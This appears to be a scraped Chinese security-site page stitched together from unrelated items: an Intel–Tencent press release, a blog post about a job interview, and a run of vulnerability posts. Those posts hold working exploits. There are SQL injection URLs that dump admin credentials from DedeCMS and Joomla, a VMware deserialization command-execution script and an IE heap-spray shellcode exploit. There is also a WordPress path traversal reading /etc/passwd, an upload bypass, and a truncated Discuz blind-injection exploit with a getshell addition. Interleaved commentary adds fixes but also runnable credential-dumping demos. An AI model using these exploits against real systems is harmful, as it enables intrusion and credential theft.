
Intel and Tencent set up a joint innovation lab

Tencent Tech, Beijing, November 3: Intel and Tencent signed a memorandum of understanding on strategic cooperation, under which the two companies will pool their strengths to form a joint innovation lab. Aligned with Intel's "connected computing" vision and Tencent's goal of one-stop online lifestyle services, the lab is to drive innovation in mobile computing technology, products and applications and build a high-quality mobile lifestyle experience for Chinese users. It refines and deepens the cooperation the two companies announced half a year ago.
    "Computing has become an indispensable part of our daily lives, and Intel is changing the way solutions are developed and delivered in order to realize the connected computing vision," said Renée James (詹睿妮), Intel senior vice president and general manager of the Software and Services Group. "China is the world's largest mobile communications market and the one with the greatest growth potential. Intel is pleased to deepen its cooperation with Tencent, a leader in China's Internet industry, to bring innovative, high-quality mobile Internet experiences to enterprise and individual users."
    China's mobile Internet user base is growing rapidly: with 3G coverage nationwide, the number of mobile Internet users in China had reached 277 million by the end of June 2010 (source: CNNIC report). Under Intel's connected computing vision, hundreds of millions more mobile devices, such as smartphones, tablets and in-vehicle information systems, will connect to the Internet, with seamless hand-off between devices creating a personalized connected computing experience. Intel architecture provides the base platform and core technology for connected computing, helping deliver energy efficiency, security and Internet connectivity across many kinds of devices. The deepened strategic cooperation is intended to combine the leadership and openness of Intel architecture and software technology with Tencent's huge user base and rich application services, creating for users in China an unprecedented high-quality mobile Internet experience that integrates communication, interaction and entertainment.
    Under the memorandum, the two sides intend to use the joint innovation lab to build a more complete and more competitive Tencent mobile services platform based on the Intel® Atom™ processor and the MeeGo* operating system. Besides developing a friendlier user interface, the work will integrate mobile Internet services with the device software so that end users get a ubiquitous, fully integrated mobile lifestyle experience. Going forward, the two sides will extend their technical and business cooperation along trends such as triple-network convergence and cloud computing, including portable devices of different screen sizes and form factors, jointly driving innovation in mobile computing products and applications in support of Tencent's strategic goal of providing one-stop online lifestyle services.
    "Tencent has more than 600 million (note 1) active accounts in China. Tencent shares Intel's connected computing vision and values highly the broad innovation opportunities that Intel architecture and software technology provide," said Xiong Minghua, co-chief technology officer of Tencent. "In response to the national call to accelerate strategic emerging industries, especially the next-generation information technology industry, Tencent hopes to join forces with Intel to innovate together, build a fully integrated Tencent mobile services platform for next-generation mobile communications, and deliver one-stop online lifestyle services to next-generation mobile Internet smart devices and their users."
    Supporting partners' innovation to help develop China's strategic emerging industries and innovation-driven economy is a long-standing Intel commitment. During the Intel Developer Forum (IDF2010) held in Beijing in April 2010, Intel and Tencent reached a cooperation agreement and announced joint innovation based on Intel's next-generation mobile computing platform and the MeeGo* operating system. Under the newly signed memorandum, the two sides will complement each other's strengths: in addition to planning to provide Tencent with hardware, software technology and innovation funding, Intel can support Tencent QQ in expanding its overseas service network through Intel's global software and services ecosystem. Intel will continue its commitment by deepening local cooperation and, together with China's IT industry, embrace the new opportunities brought by connected computing and the "intelligent" revolution.

 

非安全中国网 disclaimer 1. All statements and images in this post are purely the poster's personal opinion and do not reflect the position of this site;
2. This topic was posted by 小一; the poster 小一 complies with the six management rules of the "Copyright and Disclaimer Notice" and holds the related rights;
3. Other organizations or individuals must obtain the consent of the poster 小一 and of this site before using, reposting or citing this post;
4. Parts of this post are reposted from other media and published here to convey more information; this does not mean the site endorses their views or vouches for their accuracy;
5. If this post infringes the copyright of your site or of an individual, please notify this site immediately; it will be removed promptly with our sincere apologies;
6. Site administrators and moderators may delete this post without prior notice to the poster.

DEDECMS 5.1 feedback_js.php injection vulnerability

DedeCMS (织梦) 5.1: plus/feedback_js.php has an SQL injection

Affected version: dedecms GBK 5.1
Description: exploitable when magic_quotes_gpc=off (the injected quote must reach MySQL unescaped). The bug yields the back-end administrator's account name and password hash. The vulnerable file is plus/feedback_js.php; the unfiltered parameter is $arcurl.

......
$urlindex = 0;
if(empty($arcID))
{
    $row = $dlist->dsql->GetOne("Select id From `#@__cache_feedbackurl` where url='$arcurl' ");
    // $arcurl is not filtered here
    if(is_array($row)) $urlindex = $row['id'];
    // if a row comes back, $urlindex takes $row['id'], so a value we make the first query return is carried into the statement below
}
if(empty($arcID) && empty($urlindex)) exit();
// exit only if both $arcID and $urlindex are empty
......
if(empty($arcID)) $wq = " urlindex = '$urlindex' ";
// with $arcID left empty, the result of the first query is placed into $wq and executed below
else $wq = " aid='$arcID' ";
$querystring = "select * from `#@__feedback` where $wq and ischeck='1' order by dtime desc";
$dlist->Init();
$dlist->SetSource($querystring);

Because the value travels through two statements, two UNIONs are needed to close the quoting:

http://www.sitedir.com.cn/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
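The second-order flow above is easier to follow end to end in a runnable model. The following is an added example, not DedeCMS code: an in-memory SQLite database with constructed tables standing in for `#@__cache_feedbackurl`, `#@__feedback` and `dede_admin`, a function that copies the control flow of feedback_js.php, and the same function with bound parameters. The inner payload is nested with a doubled single quote because SQLite has no MySQL-style double-quoted strings; the effect is the same as the advisory's URL. It assumes magic_quotes_gpc=off, i.e. the quote arrives unescaped.

```python
import sqlite3


def build_db():
    """Constructed stand-ins for the three DedeCMS tables the vulnerable code touches."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE cache_feedbackurl (id INTEGER, url TEXT);
        CREATE TABLE feedback (aid INTEGER, urlindex INTEGER, msg TEXT, ischeck TEXT, dtime INTEGER);
        CREATE TABLE admin (userid TEXT, pwd TEXT);
        INSERT INTO cache_feedbackurl VALUES (7, 'http://example.test/a.html');
        INSERT INTO feedback VALUES (1, 7, 'nice article', '1', 100);
        INSERT INTO admin VALUES ('admin', '5d41402abc4b2a76b9719d911017c592');
    """)
    return conn


def feedback_vulnerable(conn, arc_id, arcurl):
    """Mirrors plus/feedback_js.php: $arcurl goes into the first query unescaped, and
    whatever that query returns becomes $urlindex, quoted, in the second query."""
    urlindex = 0
    if not arc_id:
        row = conn.execute(
            f"SELECT id FROM cache_feedbackurl WHERE url='{arcurl}'").fetchone()
        if row:
            urlindex = row[0]
    if not arc_id and not urlindex:
        return []
    wq = f" urlindex = '{urlindex}' " if not arc_id else f" aid='{arc_id}' "
    sql = f"SELECT * FROM feedback WHERE {wq} AND ischeck='1' ORDER BY dtime DESC"
    return conn.execute(sql).fetchall()


def feedback_fixed(conn, arc_id, arcurl):
    """Hardened version: every user-derived value is bound, and the id coming back from
    the first query is forced to an integer before it is reused."""
    urlindex = 0
    if not arc_id:
        row = conn.execute(
            "SELECT id FROM cache_feedbackurl WHERE url=?", (arcurl,)).fetchone()
        if row:
            urlindex = int(row[0])
    if not arc_id and not urlindex:
        return []
    if arc_id:
        sql, params = ("SELECT * FROM feedback WHERE aid=? AND ischeck='1' "
                       "ORDER BY dtime DESC", (int(arc_id),))
    else:
        sql, params = ("SELECT * FROM feedback WHERE urlindex=? AND ischeck='1' "
                       "ORDER BY dtime DESC", (urlindex,))
    return conn.execute(sql, params).fetchall()


# Stage 2: what $urlindex has to become. It closes urlindex='...', unions the admin
# table in (five columns, matching `feedback`) and comments out the rest of the statement.
STAGE2 = "' UNION SELECT userid, pwd, 1, 1, 1 FROM admin -- "

# Stage 1: make the first query *return* STAGE2 as the id. The embedded quote is doubled
# inside the SQLite string literal; the trailing WHERE ''=' absorbs the query's own closing quote.
PAYLOAD = "' UNION SELECT '" + STAGE2.replace("'", "''") + "' WHERE ''='"


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", feedback_vulnerable(db, "", PAYLOAD))
    print("fixed:     ", feedback_fixed(db, "", PAYLOAD))
```

With the payload the vulnerable handler returns the admin row (userid and hash in the first two columns); the parameterised handler finds no cache row for that URL and returns nothing, while both behave identically for a genuine URL.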
Notice: https://www.sitedirsec.com publishes the latest vulnerabilities; please follow it.

VMware vSphere Data Protection 5.x/6.x Java deserialization remote code execution
#!/usr/bin/env python
# Python 2. Connects to the RMI port (plain TCP or TLS), sends the Java RMI transport
# handshake, then a serialized object graph with the command spliced into it; the
# server deserializes the graph and the command is executed.


import socket
import sys
import ssl


def getHeader():
    # 'JRMI' magic, protocol version 2, 'K' = StreamProtocol
    return '\x4a\x52\x4d\x49\x00\x02\x4b'

def payload():
    cmd = sys.argv[4]
    cmdlen = len(cmd)
    # The leading bytes of the serialized object are not present in this copy of the exploit.
    data2 = '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'
    # Java modified-UTF8 string: 2-byte big-endian length, then the command bytes
    # (chr(cmdlen) only covers commands shorter than 256 bytes)
    data2 += '\x00' + chr(cmdlen)
    data2 += cmd
    # TC_STRING "exec", then the remainder of the object graph; the java.lang.Integer,
    # java.lang.Number and java.lang.Override class descriptors are visible in it
    data2 += '\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7e\x00\x24\x00\x00\x00\x01\x71\x00\x7e\x00\x29\x73\x71\x00\x7e\x00\x17\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x70\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x70\x78\x70\x00\x00\x00\x01\x73\x71\x00\x7e\x00\x09\x3f\x40\x00\x00\x00\x00\x00\x10\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x78\x70\x71\x00\x7e\x00\x3f\x78\x71\x00\x7e\x00\x3f'
    return data2

def sslMode():
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
    return ssl.wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLSv1, ciphers="ALL")

def exploitTarget(sock):
    server_address = (sys.argv[1], int(sys.argv[2]))
    print 'connecting to %s port %s' % server_address
    sock.connect(server_address)
    print 'sending exploit headers\n'
    sock.send(getHeader())
    sock.recv(8192)          # read the server's ProtocolAck before sending the object
    print 'sending exploit\n'
    sock.send(payload())
    sock.close()
    print 'exploit completed.'

if __name__ == "__main__":
    if len(sys.argv) != 5:
        print 'Usage: python ' + sys.argv[0] + ' host port ssl cmd'
        print 'ie: python ' + sys.argv[0] + ' 192.168.1.100 1099 false "ping -c 4 yahoo.com"'
        sys.exit(0)
    else:
        if sys.argv[3].lower() == "true":
            sock = sslMode()
        else:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
        exploitTarget(sock)
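The two sends in the script, the 7-byte RMI handshake and a Java-serialized object graph, are the parts worth recognising on the wire. The following is an added example in Python 3 (mine, not the exploit's or VMware's code): it builds the same handshake from its fields, checks for the ObjectOutputStream magic, and pulls class names out of TC_CLASSDESC records with a heuristic scan, which is what a detection rule needs to see which classes a blob asks the server to instantiate. The sample stream is constructed from the java.lang.Integer and java.lang.Number descriptors visible in the payload; the scanner is deliberately not a full deserializer.

```python
import struct

# Java RMI transport handshake: 'JRMI', protocol version 2, then 'K' (0x4b) = StreamProtocol.
JRMI_MAGIC = b"JRMI"
JRMI_VERSION = 2
STREAM_PROTOCOL = 0x4B

# java.io.ObjectStreamConstants
STREAM_MAGIC = b"\xac\xed\x00\x05"   # STREAM_MAGIC 0xaced, STREAM_VERSION 5
TC_CLASSDESC = 0x72


def jrmi_handshake_header():
    """Build the handshake from its fields; equals the exploit's hard-coded getHeader() bytes."""
    return JRMI_MAGIC + struct.pack(">H", JRMI_VERSION) + bytes([STREAM_PROTOCOL])


def is_java_serialized(blob):
    """True if the blob starts with the ObjectOutputStream magic and version."""
    return blob.startswith(STREAM_MAGIC)


def _looks_like_class_name(raw):
    try:
        s = raw.decode("ascii")
    except UnicodeDecodeError:
        return False
    return (s[:1].isalpha() or s[:1] == "[") and all(c.isalnum() or c in "._$[;" for c in s)


def classdesc_names(blob):
    """Heuristic scan for TC_CLASSDESC (0x72) followed by a modified-UTF8 class name
    (2-byte big-endian length, then the bytes). Back-references (TC_REFERENCE) and
    proxy descriptors are not followed, so only explicitly written descriptors appear."""
    names = []
    i = 0
    while i + 3 <= len(blob):
        if blob[i] == TC_CLASSDESC:
            (length,) = struct.unpack(">H", blob[i + 1:i + 3])
            raw = blob[i + 3:i + 3 + length]
            if 0 < length <= 255 and len(raw) == length and _looks_like_class_name(raw):
                names.append(raw.decode("ascii"))
                i += 3 + length      # skip past the name so 'r' bytes inside it are not re-read
                continue
        i += 1
    return names


# Constructed sample: stream magic, then the Integer descriptor (serialVersionUID, flags,
# one field 'I value'), its superclass Number, TC_NULL for Number's superclass, and the value 1.
SAMPLE_STREAM = (
    STREAM_MAGIC
    + b"\x73\x72\x00\x11java.lang.Integer"
    + b"\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01I\x00\x05value"
    + b"\x78\x72\x00\x10java.lang.Number"
    + b"\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70"
    + b"\x00\x00\x00\x01"
)


if __name__ == "__main__":
    print(jrmi_handshake_header())
    print(is_java_serialized(SAMPLE_STREAM), classdesc_names(SAMPLE_STREAM))
```

A network sensor that sees the JRMI handshake followed by a stream whose class list contains anything beyond the expected JDK types has a concrete thing to alert on; matching on the handshake alone only tells you RMI is in use.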

Joomla: latest SQL injection vulnerability
# Title: Joomla (Job Component) SQL Injection Vulnerability
# EDB-ID: 11307
# CVE-ID: ()
# OSVDB-ID: ()
# Author: B-HUNT3|2
# Published: 2010-02-01


[~]>> ...[BEGIN ADVISORY]...

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> TITLE: Joomla (Job Component) SQL Injection Vulnerability
[~]>> LANGUAGE: PHP
[~]>> RESEARCHER: B-HUNT3|2
[~]>> CONTACT: bhunt3r[at_no_spam]gmail[dot_no_spam]com

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> DESCRIPTION: Input var id_job is vulnerable to SQL Code Injection
[~]>> AFFECTED VERSIONS: N/A
[~]>> RISK: Medium/High
[~]>> IMPACT: Execute Arbitrary SQL queries

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> PROOF OF CONCEPT:

[~]>> http://server/index.php?option=com_job&controller=listcategory&task=viewJob&id_job=[SQL]

[~]>> http://server/index.php?option=com_job&controller=listcategory&task=viewJob&id_job=-1+UNION+ALL+SELECT+1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+FROM+jos_users--

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> ...[END ADVISORY]...
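The PoC pads its UNION to 42 columns because the injected SELECT must return exactly as many columns as the query it is grafted onto. The following added example (my code, not the Job component's) shows how that count is found by probing, how the same payload shape then pulls rows out of jos_users, and what the fix looks like. The schema is constructed for the example (a four-column `jobs` table and a `jos_users` table in SQLite); the handler interpolates id_job unquoted, which is the class of bug the advisory describes.

```python
import sqlite3


def build_db():
    """Constructed stand-in for the component's tables (not Joomla's real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE jobs (id_job INTEGER, title TEXT, company TEXT, salary INTEGER);
        CREATE TABLE jos_users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO jobs VALUES (1, 'Security Engineer', 'Example Ltd', 1000);
        INSERT INTO jos_users VALUES (62, 'admin', 'a94a8fe5ccb19ba61c4c0873d391e987982fbbd3:v3Ry');
    """)
    return conn


def view_job_vulnerable(conn, id_job):
    """id_job is interpolated into the statement unquoted."""
    return conn.execute(f"SELECT * FROM jobs WHERE id_job={id_job}").fetchall()


def view_job_fixed(conn, id_job):
    """Cast to int first ((int)/intval in PHP) and bind the value; non-numeric input raises."""
    return conn.execute("SELECT * FROM jobs WHERE id_job=?", (int(id_job),)).fetchall()


def fixed_rejects(conn, id_job):
    """True if the hardened handler refuses the input instead of running it."""
    try:
        view_job_fixed(conn, id_job)
    except ValueError:
        return True
    return False


def find_column_count(query, max_cols=64):
    """Grow 'UNION ALL SELECT NULL,...' until the database stops rejecting the column-count
    mismatch. NULL is used because it is compatible with every column type."""
    for n in range(1, max_cols + 1):
        nulls = ",".join(["NULL"] * n)
        try:
            query(f"-1 UNION ALL SELECT {nulls}--")
            return n
        except sqlite3.OperationalError:
            continue
    return None


def dump_users(query, ncols):
    """Same shape as the advisory's payload: username and password in columns 2 and 3,
    the remaining positions padded with numbers, -1 so the original query matches nothing."""
    cols = ["1", "username", "password"] + [str(i) for i in range(4, ncols + 1)]
    rows = query(f"-1 UNION ALL SELECT {','.join(cols)} FROM jos_users--")
    return [(r[1], r[2]) for r in rows]


def run_attack(conn):
    """Probe the column count, then dump credentials through the vulnerable handler."""
    query = lambda injected: view_job_vulnerable(conn, injected)
    ncols = find_column_count(query)
    return ncols, dump_users(query, ncols)


if __name__ == "__main__":
    db = build_db()
    print(run_attack(db))
    print(fixed_rejects(db, "-1 UNION ALL SELECT 1,2,3,4--"))
```

The probe needs one request per candidate column count and the error it watches for is the database's own "column count mismatch" message, so on a production site the same probing is visible in the web server's error log long before credentials leave the box.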

Microsoft SQL Server Distributed Management Objects overflow
<!--
+ title: Microsoft SQL Server Distributed Management Objects Buffer Overflow
+ Critical: Critical (remote)
+ Impact: MS Internet Explorer 6 -> Code Execute
+ Tested Operating System: Windows XP SP2 KR, Windows 2000 Pro SP4 KR
+ Tested Software: MSDE 2000 SQLDMO.dll (version 2000.80.760.0)
+ Reference & Thanks :
     code by rgod http://www.milw0rm.com/exploits/4379
     code by Trirat Puttaraksa http://www.milw0rm.com/exploits/2426
+ Author: 96sysim (sysim@nate.com)
-->
<html>
<object classid='clsid:10020200-E260-11CF-AE68-00AA004A34D5' id='SQLServer'></object>
<SCRIPT language="javascript">
// Heap Spray
// execute "calc.exe"
shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
bigblock = unescape("%u9090%u9090");            // NOP sled material
headersize = 20;
slackspace = headersize + shellcode.length;
while (bigblock.length < slackspace) bigblock += bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length - slackspace);
while (block.length + slackspace < 0x40000) block = block + block + fillblock;   // 256 KB blocks
memory = new Array();
for (i = 0; i < 501; i++) memory[i] = block + shellcode;   // ~128 MB of sled+shellcode
</SCRIPT>
<script language='vbscript'>
targetFile = "C:\Programmi\Microsoft SQL Server\80\Tools\Binn\sqldmo.dll"
prototype  = "Sub Start ( ByVal StartMode As Boolean ,  [ ByVal Server As Variant ] ,  [ ByVal Login As Variant ] ,  [ ByVal Password As Variant ] )"
memberName = "Start"
progid     = "SQLDMO.SQLServer"
argCount   = 4
myseh      = unescape("%u0D0D%u0D0D")   ' heap spray range - possible change
StartMode = True
' Overlong Server argument overflows the buffer; myseh lands in the sprayed range.
' Note: edx is used but not defined anywhere in the posted code (an undefined VBScript variable concatenates as an empty string).
Server    = "http://ZZZZYYYYXXXXWW?WVVVVAAAAAAAAAAAAAAAAAA@AA        es        est        est        es.        testMMMMLLLLKKKJJJJIIIIHH.HGGGGGFFFFEEEEDDDDDDDBBBBAAAA\\\\:#$%AAAABBBBCCCCDD?DEEEEFFFFGGG\:#$%HHHHHIIII        e@st        es        est        est        es.aaaabbbbccccddddeeeeffffgggghhhhiiiiaaaaaaaaa" + myseh + "Dmmm" + edx + "nnnBBBBAAAAZZ\\\\:#$%YYYYXXXXWWWWVV?VUUUUTTTTSSS\:#$%RRRRRQQQQPP@PPOOONNNNMMMMLLL.KKKKKJJJJIIIIHHHGGGGFFFFEE.EDDDDDDDDDBBBBAAAAAAAAAAAAAAA\\\\:#$%AAAAAAAAAAAAAA?Awwwwvvvvuuu\:#$%        ttttssssr@rrqqqppppoooonn.mmmmmllllkkkkjjjiiiihhhhgg.gfffffeeeeddddcccbbbaaaaAAAA\\\"
Login     = "aaaaaaaa"
Password  = "bbbbbbbb"
SQLServer.Start StartMode, Server, Login, Password
</script>
</html>

Going to an interview at NSFOCUS (绿盟科技) on Monday - 伤心的鱼
Source: 伤心的鱼 BLOG  http://www.hack521.cn
Copyright: 伤心的鱼
Yesterday, while chatting with an editor from 黑手, I saw him mention that a friend's company was hiring security engineers and wanted someone with some understanding of penetration testing. I figured I met their requirements, so I sent over a résumé. Before noon today the company called me and asked me to come in on Monday. Yesterday I only knew it was a security company; I hadn't expected it to be NSFOCUS, the authoritative company in the industry that I had always heard about and that, to me, was a place I could only imagine. I never thought I'd actually be going there for an interview. For me it's an opportunity and also a challenge; whether it works out or not, it will be an experience of my own. 小志 is right: whatever happens, I'll have interviewed at NSFOCUS. Cheering myself on; I believe I'm the best.

WordPress Photo Gallery 1.3.34 / 1.3.42 path traversal vulnerability
Details
================
Software: Photo Gallery
Version: 1.3.34,1.3.42
Homepage: https://wordpress.org/plugins/photo-gallery/
Advisory report: https://security.dxw.com/advisories/path-traversal-in-photo-gallery-may-allow-admins-to-read-most-files-on-the-filesystem/
CVE: Awaiting assignment
CVSS: 4 (Medium; AV:N/AC:L/Au:S/C:P/I:N/A:N)

Description
================
Path traversal in Photo Gallery may allow admins to read most files on the filesystem

Vulnerability
================
The plugin contains a file manager component which allows broad access to the filesystem, including deleting, uploading and moving files. In this proof of concept we'll use path traversal to copy a configuration file from /etc into a web-readable directory so that the attacker can read secrets.

Proof of concept
================

Visit: http://localhost/wp-admin/admin.php?page=galleries_bwg
Click Add new then Add Images
Right-click on the file manager overlay, click Inspect, and use the dev tools to get the URL of this iframe
Remove &extensions=jpg%2Cjpeg%2Cpng%2Cgif from the URL
Append &dir=/../../../../../../etc/ to the URL
Visit that URL
Select the passwd file by clicking on it once
Press the copy button in the toolbar
Press the up button repeatedly until you arrive back at wp-content/uploads/photo-gallery
Press the paste button
Visit http://localhost/wp-content/uploads/photo-gallery/passwd to read the list of users

The number of ../ you need to add to the URL will vary, and the web server may be configured to only allow reading files with certain extensions.
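What the steps above exploit is a `dir` parameter that is joined onto the uploads directory without checking where the result ends up, plus an `extensions=` filter that lives in the URL and can simply be removed. The following is an added example, not the plugin's code, of the containment check that defeats the traversal, written in Python; the upload base path and the function names are assumptions. It resolves the candidate path first and only then tests containment, so `..` segments and symlinks are handled by the resolver rather than by string-matching `../`.

```python
import os

# Assumed upload root of the plugin; the real path depends on the installation.
UPLOAD_BASE = "/var/www/html/wp-content/uploads/photo-gallery"


def resolve_dir(base, requested):
    """Map a user-supplied 'dir' parameter onto a directory under base.
    Returns the resolved absolute path, or None when the request escapes base.
    realpath() collapses '..' and follows symlinks before the comparison, so
    'a/../../etc' and a symlink that points outside base are both caught."""
    base_real = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base_real, requested.lstrip("/\\")))
    try:
        inside = os.path.commonpath([base_real, candidate]) == base_real
    except ValueError:          # paths on different drives (Windows)
        inside = False
    return candidate if inside else None


def resolve_file(base, requested_dir, name):
    """Same check for a file inside that directory; a bare file name must not
    carry any path separator or be '.'/'..'."""
    if not name or "/" in name or "\\" in name or name in (".", ".."):
        return None
    directory = resolve_dir(base, requested_dir)
    return None if directory is None else os.path.join(directory, name)


if __name__ == "__main__":
    for req in ("/../../../../../../etc/", "album1", "album1/../../../etc"):
        print(repr(req), "->", resolve_dir(UPLOAD_BASE, req))
```

Rejecting the request is the right outcome here rather than "sanitising" it: stripping `../` and retrying invites `....//` style bypasses, whereas comparing the resolved path against the resolved base has no such corner cases.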

Mitigations
================
Upgrade to version 1.3.43 or later.

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/

Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report within 14 days.

Timeline
================

2017-03-29: Discovered
2017-05-26: Reported to support@web-dorado.com
2017-05-29: Received reply saying it would be fixed in 1.3.43
2017-05-30: Version 1.3.43 was released
2017-06-16: Advisory published



Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.

EZEIP 3.0 multi-page upload validation vulnerability
1. Raise Internet Explorer's security setting to the highest level, which stops JavaScript from executing.

2. Open the page that edits the allowed upload types, add the aspx type and click save, then open an upload page and upload.

Page with the problematic upload-type configuration:
http://www.sitedirsec.com/whir_system/module/config/upload.aspx

Upload pages:

http://www.XXX.com/whir_system/module/picture/radiopictureselect.aspx

http://www.XXX.com/whir_system/module/picture/uploadpicture.aspx

http://www.XXX.com/whir_system/module/picture/pictureselect.aspx

http://www.xxxj.com/whir_system/module/picture/picturesingleselect.aspx

http://www.xxx.com/whir_system/module/video/videoupload.aspx

This product is used mostly by government and mid-sized sites; administrators who see this should fix it as soon as possible.
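Both steps above defeat checks that live in the browser or in an administrator-editable allowlist. The following is an added example (mine, not EZEIP code) of a server-side upload check in Python that survives both: the browser's JavaScript is irrelevant to it, and the configured list is intersected with a fixed set of image types, so adding aspx through the configuration page changes nothing. The extension sets and magic bytes are standard values; the function name is an assumption.

```python
import os

# Server-side policy. Whatever list an administrator edits in the UI is only ever
# intersected with IMAGE_EXTENSIONS; executable types can never be enabled from a web page.
IMAGE_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}
EXECUTABLE_EXTENSIONS = {"aspx", "asp", "ashx", "asmx", "asa", "cer", "php", "jsp", "config"}
MAGIC_BYTES = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def validate_upload(filename, content, configured=IMAGE_EXTENSIONS):
    """Return (ok, reason). Runs on the server regardless of what the browser did:
    1. keep only the base name (no directory components from the client);
    2. refuse an executable extension anywhere in the name (shell.aspx.jpg included);
    3. the final extension must be in the effective allowlist;
    4. the first bytes must match that image type."""
    name = os.path.basename(filename.replace("\\", "/")).lower()
    parts = name.split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "no usable extension"
    extensions = parts[1:]
    if any(e in EXECUTABLE_EXTENSIONS for e in extensions):
        return False, "executable extension"
    ext = extensions[-1]
    effective = {e.lower() for e in configured} & IMAGE_EXTENSIONS
    if ext not in effective:
        return False, "extension not allowed"
    if not any(content.startswith(magic) for magic in MAGIC_BYTES[ext]):
        return False, "content does not match extension"
    return True, ext


if __name__ == "__main__":
    # constructed inputs: an ASPX page uploaded with the admin-edited list, and a real JPEG header
    print(validate_upload("shell.aspx", b"<%@ Page Language='C#' %>", {"jpg", "png", "aspx"}))
    print(validate_upload("photo.jpg", b"\xff\xd8\xff\xe0JFIF"))
```

The magic-byte check is a weak signal on its own (a polyglot can carry a valid JPEG header and still contain script), which is why the executable-extension refusal comes first and is not configurable; storing uploads under a path that the web server never executes is the remaining layer.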

The latest Discuz 1.5 0day circulating recently
<?php
print_r('
+---------------------------------------------------------------------------+
Discuz! X1-1.5 notify_credit.php Blind SQL injection exploit by toby57    2010.11.05
mail: toby57 at 163 dot com
Note: alibaba appended the follow-on getshell code
+---------------------------------------------------------------------------+
');
if ($argc < 2) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url [pre]
Example:
php '.$argv[0].' http://localhost/
php '.$argv[0].' http://localhost/ xss_
+---------------------------------------------------------------------------+
');
    exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$url = $argv[1];
$pre = $argv[2] ? $argv[2] : 'pre_';
$target = parse_url($url);
extract($target);
$path1 = $path . '/api/trade/notify_credit.php';

// candidate characters for the 32-character hex sitekey: 0-9 and a-f
$hash = array();
$hash = array_merge($hash, range(48, 57));
$hash = array_merge($hash, range(97, 102));

// 1. confirm the injection: a bare quote must produce a MySQL syntax error
$tmp_expstr = "'";
$res = send();
if (strpos($res, 'SQL syntax') == false) {
    var_dump($res);
    die('Oooops.I can NOT hack it.');
}
// the error message leaks the table prefix
preg_match('/FROM\s([a-zA-Z_]+)forum_order/', $res, $match);
if ($match[1]) $pre = $match[1];

// 2. verify the prefix; if the table does not exist, brute-force the prefix from information_schema
//    (10-column UNION; the commas were lost in the posted copy and are restored here)
$tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_setting WHERE ''='";
$res = send();
if (strpos($res, "doesn't exist") !== false) {
    echo "Table_pre is WRONG!\nReady to Crack It.Please Waiting..\n";
    for ($i = 1; $i < 20; $i++) {
